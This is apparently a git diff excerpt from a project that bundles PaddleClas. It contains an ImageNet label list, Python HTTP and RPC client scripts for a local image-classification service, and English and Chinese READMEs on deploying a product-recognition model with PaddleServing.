+Staffordshire bullterrier, Staffordshire bull terrier, +American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier, +Bedlington terrier, +Border terrier, +Kerry blue terrier, +Irish terrier, 
+Norfolk terrier, +Norwich terrier, +Yorkshire terrier, +wire-haired fox terrier, +Lakeland terrier, +Sealyham terrier, Sealyham, +Airedale, Airedale terrier, +cairn, cairn terrier, +Australian terrier, +Dandie Dinmont, Dandie Dinmont terrier, +Boston bull, Boston terrier, +miniature schnauzer, +giant schnauzer, +standard schnauzer, +Scotch terrier, Scottish terrier, Scottie, +Tibetan terrier, chrysanthemum dog, +silky terrier, Sydney silky, +soft-coated wheaten terrier, +West Highland white terrier, +Lhasa, Lhasa apso, +flat-coated retriever, +curly-coated retriever, +golden retriever, +Labrador retriever, +Chesapeake Bay retriever, +German short-haired pointer, +vizsla, Hungarian pointer, +English setter, +Irish setter, red setter, +Gordon setter, +Brittany spaniel, +clumber, clumber spaniel, +English springer, English springer spaniel, +Welsh springer spaniel, +cocker spaniel, English cocker spaniel, cocker, +Sussex spaniel, +Irish water spaniel, +kuvasz, +schipperke, +groenendael, +malinois, +briard, +kelpie, +komondor, +Old English sheepdog, bobtail, +Shetland sheepdog, Shetland sheep dog, Shetland, +collie, +Border collie, +Bouvier des Flandres, Bouviers des Flandres, +Rottweiler, +German shepherd, German shepherd dog, German police dog, alsatian, +Doberman, Doberman pinscher, +miniature pinscher, +Greater Swiss Mountain dog, +Bernese mountain dog, +Appenzeller, +EntleBucher, +boxer, +bull mastiff, +Tibetan mastiff, +French bulldog, +Great Dane, +Saint Bernard, St Bernard, +Eskimo dog, husky, +malamute, malemute, Alaskan malamute, +Siberian husky, +dalmatian, coach dog, carriage dog, +affenpinscher, monkey pinscher, monkey dog, +basenji, +pug, pug-dog, +Leonberg, +Newfoundland, Newfoundland dog, +Great Pyrenees, +Samoyed, Samoyede, +Pomeranian, +chow, chow chow, +keeshond, +Brabancon griffon, +Pembroke, Pembroke Welsh corgi, +Cardigan, Cardigan Welsh corgi, +toy poodle, +miniature poodle, +standard poodle, +Mexican hairless, +timber wolf, grey wolf, gray 
wolf, Canis lupus, +white wolf, Arctic wolf, Canis lupus tundrarum, +red wolf, maned wolf, Canis rufus, Canis niger, +coyote, prairie wolf, brush wolf, Canis latrans, +dingo, warrigal, warragal, Canis dingo, +dhole, Cuon alpinus, +African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus, +hyena, hyaena, +red fox, Vulpes vulpes, +kit fox, Vulpes macrotis, +Arctic fox, white fox, Alopex lagopus, +grey fox, gray fox, Urocyon cinereoargenteus, +tabby, tabby cat, +tiger cat, +Persian cat, +Siamese cat, Siamese, +Egyptian cat, +cougar, puma, catamount, mountain lion, painter, panther, Felis concolor, +lynx, catamount, +leopard, Panthera pardus, +snow leopard, ounce, Panthera uncia, +jaguar, panther, Panthera onca, Felis onca, +lion, king of beasts, Panthera leo, +tiger, Panthera tigris, +cheetah, chetah, Acinonyx jubatus, +brown bear, bruin, Ursus arctos, +American black bear, black bear, Ursus americanus, Euarctos americanus, +ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus, +sloth bear, Melursus ursinus, Ursus ursinus, +mongoose, +meerkat, mierkat, +tiger beetle, +ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle, +ground beetle, carabid beetle, +long-horned beetle, longicorn, longicorn beetle, +leaf beetle, chrysomelid, +dung beetle, +rhinoceros beetle, +weevil, +fly, +bee, +ant, emmet, pismire, +grasshopper, hopper, +cricket, +walking stick, walkingstick, stick insect, +cockroach, roach, +mantis, mantid, +cicada, cicala, +leafhopper, +lacewing, lacewing fly, +"dragonfly, darning needle, devils darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk", +damselfly, +admiral, +ringlet, ringlet butterfly, +monarch, monarch butterfly, milkweed butterfly, Danaus plexippus, +cabbage butterfly, +sulphur butterfly, sulfur butterfly, +lycaenid, lycaenid butterfly, +starfish, sea star, +sea urchin, +sea cucumber, holothurian, +wood rabbit, cottontail, cottontail rabbit, +hare, +Angora, Angora rabbit, +hamster, 
+porcupine, hedgehog, +fox squirrel, eastern fox squirrel, Sciurus niger, +marmot, +beaver, +guinea pig, Cavia cobaya, +sorrel, +zebra, +hog, pig, grunter, squealer, Sus scrofa, +wild boar, boar, Sus scrofa, +warthog, +hippopotamus, hippo, river horse, Hippopotamus amphibius, +ox, +water buffalo, water ox, Asiatic buffalo, Bubalus bubalis, +bison, +ram, tup, +bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis, +ibex, Capra ibex, +hartebeest, +impala, Aepyceros melampus, +gazelle, +Arabian camel, dromedary, Camelus dromedarius, +llama, +weasel, +mink, +polecat, fitch, foulmart, foumart, Mustela putorius, +black-footed ferret, ferret, Mustela nigripes, +otter, +skunk, polecat, wood pussy, +badger, +armadillo, +three-toed sloth, ai, Bradypus tridactylus, +orangutan, orang, orangutang, Pongo pygmaeus, +gorilla, Gorilla gorilla, +chimpanzee, chimp, Pan troglodytes, +gibbon, Hylobates lar, +siamang, Hylobates syndactylus, Symphalangus syndactylus, +guenon, guenon monkey, +patas, hussar monkey, Erythrocebus patas, +baboon, +macaque, +langur, +colobus, colobus monkey, +proboscis monkey, Nasalis larvatus, +marmoset, +capuchin, ringtail, Cebus capucinus, +howler monkey, howler, +titi, titi monkey, +spider monkey, Ateles geoffroyi, +squirrel monkey, Saimiri sciureus, +Madagascar cat, ring-tailed lemur, Lemur catta, +indri, indris, Indri indri, Indri brevicaudatus, +Indian elephant, Elephas maximus, +African elephant, Loxodonta africana, +lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens, +giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca, +barracouta, snoek, +eel, +coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch, +rock beauty, Holocanthus tricolor, +anemone fish, +sturgeon, +gar, garfish, garpike, billfish, Lepisosteus osseus, +lionfish, +puffer, pufferfish, blowfish, globefish, +abacus, +abaya, +"academic gown, academic robe, judges robe", +accordion, piano accordion, 
squeeze box, +acoustic guitar, +aircraft carrier, carrier, flattop, attack aircraft carrier, +airliner, +airship, dirigible, +altar, +ambulance, +amphibian, amphibious vehicle, +analog clock, +apiary, bee house, +apron, +ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin, +assault rifle, assault gun, +backpack, back pack, knapsack, packsack, rucksack, haversack, +bakery, bakeshop, bakehouse, +balance beam, beam, +balloon, +ballpoint, ballpoint pen, ballpen, Biro, +Band Aid, +banjo, +bannister, banister, balustrade, balusters, handrail, +barbell, +barber chair, +barbershop, +barn, +barometer, +barrel, cask, +barrow, garden cart, lawn cart, wheelbarrow, +baseball, +basketball, +bassinet, +bassoon, +bathing cap, swimming cap, +bath towel, +bathtub, bathing tub, bath, tub, +beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon, +beacon, lighthouse, beacon light, pharos, +beaker, +bearskin, busby, shako, +beer bottle, +beer glass, +bell cote, bell cot, +bib, +bicycle-built-for-two, tandem bicycle, tandem, +bikini, two-piece, +binder, ring-binder, +binoculars, field glasses, opera glasses, +birdhouse, +boathouse, +bobsled, bobsleigh, bob, +bolo tie, bolo, bola tie, bola, +bonnet, poke bonnet, +bookcase, +bookshop, bookstore, bookstall, +bottlecap, +bow, +bow tie, bow-tie, bowtie, +brass, memorial tablet, plaque, +brassiere, bra, bandeau, +breakwater, groin, groyne, mole, bulwark, seawall, jetty, +breastplate, aegis, egis, +broom, +bucket, pail, +buckle, +bulletproof vest, +bullet train, bullet, +butcher shop, meat market, +cab, hack, taxi, taxicab, +caldron, cauldron, +candle, taper, wax light, +cannon, +canoe, +can opener, tin opener, +cardigan, +car mirror, +carousel, carrousel, merry-go-round, roundabout, whirligig, +"carpenters kit, tool kit", +carton, +car wheel, +cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM, 
+cassette, +cassette player, +castle, +catamaran, +CD player, +cello, violoncello, +cellular telephone, cellular phone, cellphone, cell, mobile phone, +chain, +chainlink fence, +chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour, +chain saw, chainsaw, +chest, +chiffonier, commode, +chime, bell, gong, +china cabinet, china closet, +Christmas stocking, +church, church building, +cinema, movie theater, movie theatre, movie house, picture palace, +cleaver, meat cleaver, chopper, +cliff dwelling, +cloak, +clog, geta, patten, sabot, +cocktail shaker, +coffee mug, +coffeepot, +coil, spiral, volute, whorl, helix, +combination lock, +computer keyboard, keypad, +confectionery, confectionary, candy store, +container ship, containership, container vessel, +convertible, +corkscrew, bottle screw, +cornet, horn, trumpet, trump, +cowboy boot, +cowboy hat, ten-gallon hat, +cradle, +crane, +crash helmet, +crate, +crib, cot, +Crock Pot, +croquet ball, +crutch, +cuirass, +dam, dike, dyke, +desk, +desktop computer, +dial telephone, dial phone, +diaper, nappy, napkin, +digital clock, +digital watch, +dining table, board, +dishrag, dishcloth, +dishwasher, dish washer, dishwashing machine, +disk brake, disc brake, +dock, dockage, docking facility, +dogsled, dog sled, dog sleigh, +dome, +doormat, welcome mat, +drilling platform, offshore rig, +drum, membranophone, tympan, +drumstick, +dumbbell, +Dutch oven, +electric fan, blower, +electric guitar, +electric locomotive, +entertainment center, +envelope, +espresso maker, +face powder, +feather boa, boa, +file, file cabinet, filing cabinet, +fireboat, +fire engine, fire truck, +fire screen, fireguard, +flagpole, flagstaff, +flute, transverse flute, +folding chair, +football helmet, +forklift, +fountain, +fountain pen, +four-poster, +freight car, +French horn, horn, +frying pan, frypan, skillet, +fur coat, +garbage truck, dustcart, +gasmask, respirator, gas helmet, +gas pump, gasoline pump, petrol pump, island 
dispenser, +goblet, +go-kart, +golf ball, +golfcart, golf cart, +gondola, +gong, tam-tam, +gown, +grand piano, grand, +greenhouse, nursery, glasshouse, +grille, radiator grille, +grocery store, grocery, food market, market, +guillotine, +hair slide, +hair spray, +half track, +hammer, +hamper, +hand blower, blow dryer, blow drier, hair dryer, hair drier, +hand-held computer, hand-held microcomputer, +handkerchief, hankie, hanky, hankey, +hard disc, hard disk, fixed disk, +harmonica, mouth organ, harp, mouth harp, +harp, +harvester, reaper, +hatchet, +holster, +home theater, home theatre, +honeycomb, +hook, claw, +hoopskirt, crinoline, +horizontal bar, high bar, +horse cart, horse-cart, +hourglass, +iPod, +iron, smoothing iron, +"jack-o-lantern", +jean, blue jean, denim, +jeep, landrover, +jersey, T-shirt, tee shirt, +jigsaw puzzle, +jinrikisha, ricksha, rickshaw, +joystick, +kimono, +knee pad, +knot, +lab coat, laboratory coat, +ladle, +lampshade, lamp shade, +laptop, laptop computer, +lawn mower, mower, +lens cap, lens cover, +letter opener, paper knife, paperknife, +library, +lifeboat, +lighter, light, igniter, ignitor, +limousine, limo, +liner, ocean liner, +lipstick, lip rouge, +Loafer, +lotion, +loudspeaker, speaker, speaker unit, loudspeaker system, speaker system, +"loupe, jewelers loupe", +lumbermill, sawmill, +magnetic compass, +mailbag, postbag, +mailbox, letter box, +maillot, +maillot, tank suit, +manhole cover, +maraca, +marimba, xylophone, +mask, +matchstick, +maypole, +maze, labyrinth, +measuring cup, +medicine chest, medicine cabinet, +megalith, megalithic structure, +microphone, mike, +microwave, microwave oven, +military uniform, +milk can, +minibus, +miniskirt, mini, +minivan, +missile, +mitten, +mixing bowl, +mobile home, manufactured home, +Model T, +modem, +monastery, +monitor, +moped, +mortar, +mortarboard, +mosque, +mosquito net, +motor scooter, scooter, +mountain bike, all-terrain bike, off-roader, +mountain tent, +mouse, computer mouse, 
+mousetrap, +moving van, +muzzle, +nail, +neck brace, +necklace, +nipple, +notebook, notebook computer, +obelisk, +oboe, hautboy, hautbois, +ocarina, sweet potato, +odometer, hodometer, mileometer, milometer, +oil filter, +organ, pipe organ, +oscilloscope, scope, cathode-ray oscilloscope, CRO, +overskirt, +oxcart, +oxygen mask, +packet, +paddle, boat paddle, +paddlewheel, paddle wheel, +padlock, +paintbrush, +"pajama, pyjama, pjs, jammies", +palace, +panpipe, pandean pipe, syrinx, +paper towel, +parachute, chute, +parallel bars, bars, +park bench, +parking meter, +passenger car, coach, carriage, +patio, terrace, +pay-phone, pay-station, +pedestal, plinth, footstall, +pencil box, pencil case, +pencil sharpener, +perfume, essence, +Petri dish, +photocopier, +pick, plectrum, plectron, +pickelhaube, +picket fence, paling, +pickup, pickup truck, +pier, +piggy bank, penny bank, +pill bottle, +pillow, +ping-pong ball, +pinwheel, +pirate, pirate ship, +pitcher, ewer, +"plane, carpenters plane, woodworking plane", +planetarium, +plastic bag, +plate rack, +plow, plough, +"plunger, plumbers helper", +Polaroid camera, Polaroid Land camera, +pole, +police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria, +poncho, +pool table, billiard table, snooker table, +pop bottle, soda bottle, +pot, flowerpot, +"potters wheel", +power drill, +prayer rug, prayer mat, +printer, +prison, prison house, +projectile, missile, +projector, +puck, hockey puck, +punching bag, punch bag, punching ball, punchball, +purse, +quill, quill pen, +quilt, comforter, comfort, puff, +racer, race car, racing car, +racket, racquet, +radiator, +radio, wireless, +radio telescope, radio reflector, +rain barrel, +recreational vehicle, RV, R.V., +reel, +reflex camera, +refrigerator, icebox, +remote control, remote, +restaurant, eating house, eating place, eatery, +revolver, six-gun, six-shooter, +rifle, +rocking chair, rocker, +rotisserie, +rubber eraser, rubber, pencil eraser, +rugby ball, +rule, 
ruler, +running shoe, +safe, +safety pin, +saltshaker, salt shaker, +sandal, +sarong, +sax, saxophone, +scabbard, +scale, weighing machine, +school bus, +schooner, +scoreboard, +screen, CRT screen, +screw, +screwdriver, +seat belt, seatbelt, +sewing machine, +shield, buckler, +shoe shop, shoe-shop, shoe store, +shoji, +shopping basket, +shopping cart, +shovel, +shower cap, +shower curtain, +ski, +ski mask, +sleeping bag, +slide rule, slipstick, +sliding door, +slot, one-armed bandit, +snorkel, +snowmobile, +snowplow, snowplough, +soap dispenser, +soccer ball, +sock, +solar dish, solar collector, solar furnace, +sombrero, +soup bowl, +space bar, +space heater, +space shuttle, +spatula, +speedboat, +"spider web, spiders web", +spindle, +sports car, sport car, +spotlight, spot, +stage, +steam locomotive, +steel arch bridge, +steel drum, +stethoscope, +stole, +stone wall, +stopwatch, stop watch, +stove, +strainer, +streetcar, tram, tramcar, trolley, trolley car, +stretcher, +studio couch, day bed, +stupa, tope, +submarine, pigboat, sub, U-boat, +suit, suit of clothes, +sundial, +sunglass, +sunglasses, dark glasses, shades, +sunscreen, sunblock, sun blocker, +suspension bridge, +swab, swob, mop, +sweatshirt, +swimming trunks, bathing trunks, +swing, +switch, electric switch, electrical switch, +syringe, +table lamp, +tank, army tank, armored combat vehicle, armoured combat vehicle, +tape player, +teapot, +teddy, teddy bear, +television, television system, +tennis ball, +thatch, thatched roof, +theater curtain, theatre curtain, +thimble, +thresher, thrasher, threshing machine, +throne, +tile roof, +toaster, +tobacco shop, tobacconist shop, tobacconist, +toilet seat, +torch, +totem pole, +tow truck, tow car, wrecker, +toyshop, +tractor, +trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi, +tray, +trench coat, +tricycle, trike, velocipede, +trimaran, +tripod, +triumphal arch, +trolleybus, trolley coach, trackless trolley, +trombone, +tub, vat, 
+turnstile, +typewriter keyboard, +umbrella, +unicycle, monocycle, +upright, upright piano, +vacuum, vacuum cleaner, +vase, +vault, +velvet, +vending machine, +vestment, +viaduct, +violin, fiddle, +volleyball, +waffle iron, +wall clock, +wallet, billfold, notecase, pocketbook, +wardrobe, closet, press, +warplane, military plane, +washbasin, handbasin, washbowl, lavabo, wash-hand basin, +washer, automatic washer, washing machine, +water bottle, +water jug, +water tower, +whiskey jug, +whistle, +wig, +window screen, +window shade, +Windsor tie, +wine bottle, +wing, +wok, +wooden spoon, +wool, woolen, woollen, +worm fence, snake fence, snake-rail fence, Virginia fence, +wreck, +yawl, +yurt, +web site, website, internet site, site, +comic book, +crossword puzzle, crossword, +street sign, +traffic light, traffic signal, stoplight, +book jacket, dust cover, dust jacket, dust wrapper, +menu, +plate, +guacamole, +consomme, +hot pot, hotpot, +trifle, +ice cream, icecream, +ice lolly, lolly, lollipop, popsicle, +French loaf, +bagel, beigel, +pretzel, +cheeseburger, +hotdog, hot dog, red hot, +mashed potato, +head cabbage, +broccoli, +cauliflower, +zucchini, courgette, +spaghetti squash, +acorn squash, +butternut squash, +cucumber, cuke, +artichoke, globe artichoke, +bell pepper, +cardoon, +mushroom, +Granny Smith, +strawberry, +orange, +lemon, +fig, +pineapple, ananas, +banana, +jackfruit, jak, jack, +custard apple, +pomegranate, +hay, +carbonara, +chocolate sauce, chocolate syrup, +dough, +meat loaf, meatloaf, +pizza, pizza pie, +potpie, +burrito, +red wine, +espresso, +cup, +eggnog, +alp, +bubble, +cliff, drop, drop-off, +coral reef, +geyser, +lakeside, lakeshore, +promontory, headland, head, foreland, +sandbar, sand bar, +seashore, coast, seacoast, sea-coast, +valley, vale, +volcano, +ballplayer, baseball player, +groom, bridegroom, +scuba diver, +rapeseed, +daisy, +"yellow ladys slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum", +corn, +acorn, 
import requests
import json
import base64
import os


def cv2_to_base64(image):
    """Encode raw image bytes as a UTF-8 base64 string for the request body."""
    return base64.b64encode(image).decode('utf8')


if __name__ == "__main__":
    # HTTP endpoint exposed by classification_web_service.py (see config.yml).
    url = "http://127.0.0.1:18080/imagenet/prediction"
    img_path = os.path.join(".", "daisy.jpg")
    with open(img_path, 'rb') as img_file:
        raw_bytes = img_file.read()
    payload = {"key": ["image"], "value": [cv2_to_base64(raw_bytes)]}
    body = json.dumps(payload)
    # Fire 100 identical requests so throughput/QPS can be observed.
    for _ in range(100):
        resp = requests.post(url=url, data=body)
        print(resp.json())
try:
    from paddle_serving_server_gpu.pipeline import PipelineClient
except ImportError:
    from paddle_serving_server.pipeline import PipelineClient
import base64

# Connect to the locally running pipeline service (rpc_port in config.yml).
client = PipelineClient()
client.connect(['127.0.0.1:9993'])


def cv2_to_base64(image):
    """Encode raw image bytes as a UTF-8 base64 string for the feed dict."""
    return base64.b64encode(image).decode('utf8')


if __name__ == "__main__":
    with open("daisy.jpg", 'rb') as img_file:
        encoded = cv2_to_base64(img_file.read())

    # Single demo request; fetch names must match the server's fetch aliases.
    for _ in range(1):
        response = client.predict(feed_dict={"image": encoded},
                                  fetch=["label", "prob"])
        print(response)
+ +## Contents +- [Environmental preparation](#environmental-preparation) +- [Model conversion](#model-conversion) +- [Paddle Serving pipeline deployment](#paddle-serving-pipeline-deployment) +- [FAQ](#faq) + + +## Environmental preparation + +PaddleClas operating environment and PaddleServing operating environment are needed. + +1. Please prepare PaddleClas operating environment reference [link](../../docs/zh_CN/tutorials/install.md). + Download the corresponding paddle whl package according to the environment, it is recommended to install version 2.1.0. + +2. The steps of PaddleServing operating environment prepare are as follows: + + Install serving which used to start the service + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # Other GPU environments need to confirm the environment and then choose to execute the following commands + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +3. Install the client to send requests to the service + In [download link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md) find the client installation package corresponding to the python version. + The python3.7 version is recommended here: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +4. Install serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + + **note:** If you want to install the latest version of PaddleServing, refer to [link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md). + + + +## Model conversion +When using PaddleServing for service deployment, you need to convert the saved inference model into a serving model that is easy to deploy. 
+The following assumes that the current working directory is the PaddleClas root directory + +Firstly, download the inference model of ResNet50_vd +``` +cd deploy +# Download and unzip the ResNet50_vd model +wget -P models/ https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/inference/product_ResNet50_vd_aliproduct_v1.0_infer.tar +cd models +tar -xf product_ResNet50_vd_aliproduct_v1.0_infer.tar +``` + +Then, you can use installed paddle_serving_client tool to convert inference model to mobile model. +``` +# Product recognition model conversion +python3 -m paddle_serving_client.convert --dirname ./product_ResNet50_vd_aliproduct_v1.0_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./product_ResNet50_vd_aliproduct_v1.0_serving/ \ + --serving_client ./product_ResNet50_vd_aliproduct_v1.0_client/ +``` + +After the ResNet50_vd inference model is converted, there will be additional folders of `product_ResNet50_vd_aliproduct_v1.0_serving` and `product_ResNet50_vd_aliproduct_v1.0_client` in the current folder, with the following format: +``` +|- product_ResNet50_vd_aliproduct_v1.0_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- product_ResNet50_vd_aliproduct_v1.0_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt +``` + +Once you have the model file for deployment, you need to change the alias name in `serving_server_conf.prototxt`: change `alias_name` in `fetch_var` to `features`, +The modified serving_server_conf.prototxt file is as follows: +``` +feed_var { + name: "x" + alias_name: "x" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "features" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + +Next,download and unpack the built index of product gallery +``` +cd ../ +wget 
https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/data/recognition_demo_data_v1.1.tar && tar -xf recognition_demo_data_v1.1.tar +``` + + + +## Paddle Serving pipeline deployment + +**Attention:** pipeline deployment mode does not support Windows platform + +1. Download the PaddleClas code, if you have already downloaded it, you can skip this step. + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # Enter the working directory + cd PaddleClas/deploy/paddleserving/recognition + ``` + + The paddleserving directory contains the code to start the pipeline service and send prediction requests, including: + ``` + __init__.py + config.yml # configuration file of starting the service + pipeline_http_client.py # script to send pipeline prediction request by http + pipeline_rpc_client.py # script to send pipeline prediction request by rpc + recognition_web_service.py # start the script of the pipeline server + ``` + +2. Run the following command to start the service. + ``` + # Start the service and save the running log in log.txt + python3 recognition_web_service.py &>log.txt & + ``` + After the service is successfully started, a log similar to the following will be printed in log.txt + ![](../imgs/start_server_recog.png) + +3. Send service request + ``` + python3 pipeline_http_client.py + ``` + After successfully running, the predicted result of the model will be printed in the cmd window. An example of the result is: + ![](../imgs/results_recog.png) + + Adjust the number of concurrency in config.yml to get the largest QPS. + + ``` + op: + concurrency: 8 + ... + ``` + + Multiple service requests can be sent at the same time if necessary. + + The predicted performance data will be automatically written into the `PipelineServingLogs/pipeline.tracer` file. + + +## FAQ +**Q1**: No result return after sending the request. + +**A1**: Do not set the proxy when starting the service and sending the request. 
You can close the proxy before starting the service and before sending the request. The command to close the proxy is: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md new file mode 100644 index 0000000..b8b8128 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md @@ -0,0 +1,174 @@ +# 基于PaddleServing的商品识别服务部署 + +([English](./README.md)|简体中文) + +本文以商品识别为例,介绍如何使用[PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)工具部署PaddleClas动态图模型的pipeline在线服务。 + +相比较于hubserving部署,PaddleServing具备以下优点: +- 支持客户端和服务端之间高并发和高效通信 +- 支持 工业级的服务能力 例如模型管理,在线加载,在线A/B测试等 +- 支持 多种编程语言 开发客户端,例如C++, Python和Java + +更多有关PaddleServing服务化部署框架介绍和使用教程参考[文档](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)。 + +## 目录 +- [环境准备](#环境准备) +- [模型转换](#模型转换) +- [Paddle Serving pipeline部署](#部署) +- [FAQ](#FAQ) + + +## 环境准备 + +需要准备PaddleClas的运行环境和PaddleServing的运行环境。 + +- 准备PaddleClas的[运行环境](../../docs/zh_CN/tutorials/install.md), 根据环境下载对应的paddle whl包,推荐安装2.1.0版本 + +- 准备PaddleServing的运行环境,步骤如下 + +1. 安装serving,用于启动服务 + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # 其他GPU环境需要确认环境再选择执行如下命令 + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +2. 安装client,用于向服务发送请求 + 在[下载链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)中找到对应python版本的client安装包,这里推荐python3.7版本: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +3. 
安装serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + **Note:** 如果要安装最新版本的PaddleServing参考[链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)。 + + +## 模型转换 + +使用PaddleServing做服务化部署时,需要将保存的inference模型转换为serving易于部署的模型。 +以下内容假定当前工作目录为PaddleClas根目录。 + +首先,下载商品识别的inference模型 +``` +cd deploy + +# 下载并解压商品识别模型 +wget -P models/ https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/inference/product_ResNet50_vd_aliproduct_v1.0_infer.tar +cd models +tar -xf product_ResNet50_vd_aliproduct_v1.0_infer.tar +``` + +接下来,用安装的paddle_serving_client把下载的inference模型转换成易于server部署的模型格式。 + +``` +# 转换商品识别模型 +python3 -m paddle_serving_client.convert --dirname ./product_ResNet50_vd_aliproduct_v1.0_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./product_ResNet50_vd_aliproduct_v1.0_serving/ \ + --serving_client ./product_ResNet50_vd_aliproduct_v1.0_client/ +``` +商品识别推理模型转换完成后,会在当前文件夹多出`product_ResNet50_vd_aliproduct_v1.0_serving` 和`product_ResNet50_vd_aliproduct_v1.0_client`的文件夹,具备如下格式: +``` +|- product_ResNet50_vd_aliproduct_v1.0_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- product_ResNet50_vd_aliproduct_v1.0_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt + +``` +得到模型文件之后,需要修改serving_server_conf.prototxt中的alias名字: 将`fetch_var`中的`alias_name`改为`features`, +修改后的serving_server_conf.prototxt内容如下: +``` +feed_var { + name: "x" + alias_name: "x" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "features" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + +接下来,下载并解压已经构建后的商品库index +``` +cd ../ +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/data/recognition_demo_data_v1.1.tar && tar -xf recognition_demo_data_v1.1.tar +``` + + + +## Paddle Serving 
pipeline部署 + +**注意:** pipeline部署方式不支持windows平台 + +1. 下载PaddleClas代码,若已下载可跳过此步骤 + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # 进入到工作目录 + cd PaddleClas/deploy/paddleserving/recognition + ``` + paddleserving目录包含启动pipeline服务和发送预测请求的代码,包括: + ``` + __init__.py + config.yml # 启动服务的配置文件 + pipeline_http_client.py # http方式发送pipeline预测请求的脚本 + pipeline_rpc_client.py # rpc方式发送pipeline预测请求的脚本 + recognition_web_service.py # 启动pipeline服务端的脚本 + ``` + +2. 启动服务可运行如下命令: + ``` + # 启动服务,运行日志保存在log.txt + python3 recognition_web_service.py &>log.txt & + ``` + 成功启动服务后,log.txt中会打印类似如下日志 + ![](../imgs/start_server_recog.png) + +3. 发送服务请求: + ``` + python3 pipeline_http_client.py + ``` + 成功运行后,模型预测的结果会打印在cmd窗口中,结果示例为: + ![](../imgs/results_recog.png) + + 调整 config.yml 中的并发个数可以获得最大的QPS + ``` + op: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 8 + ... + ``` + 有需要的话可以同时发送多个服务请求 + + 预测性能数据会被自动写入 `PipelineServingLogs/pipeline.tracer` 文件中。 + + +## FAQ +**Q1**: 发送请求后没有结果返回或者提示输出解码报错 + +**A1**: 启动服务和发送请求时不要设置代理,可以在启动服务前和发送请求前关闭代理,关闭代理的命令是: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/__init__.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml b/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml new file mode 100644 index 0000000..f67ee55 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml @@ -0,0 +1,43 @@ +#worker_num, 最大并发数。当build_dag_each_worker=True时, 框架会创建worker_num个进程,每个进程内构建grpcSever和DAG +##当build_dag_each_worker=False时,框架会设置主线程grpc线程池的max_workers=worker_num +worker_num: 1 + +#http端口, 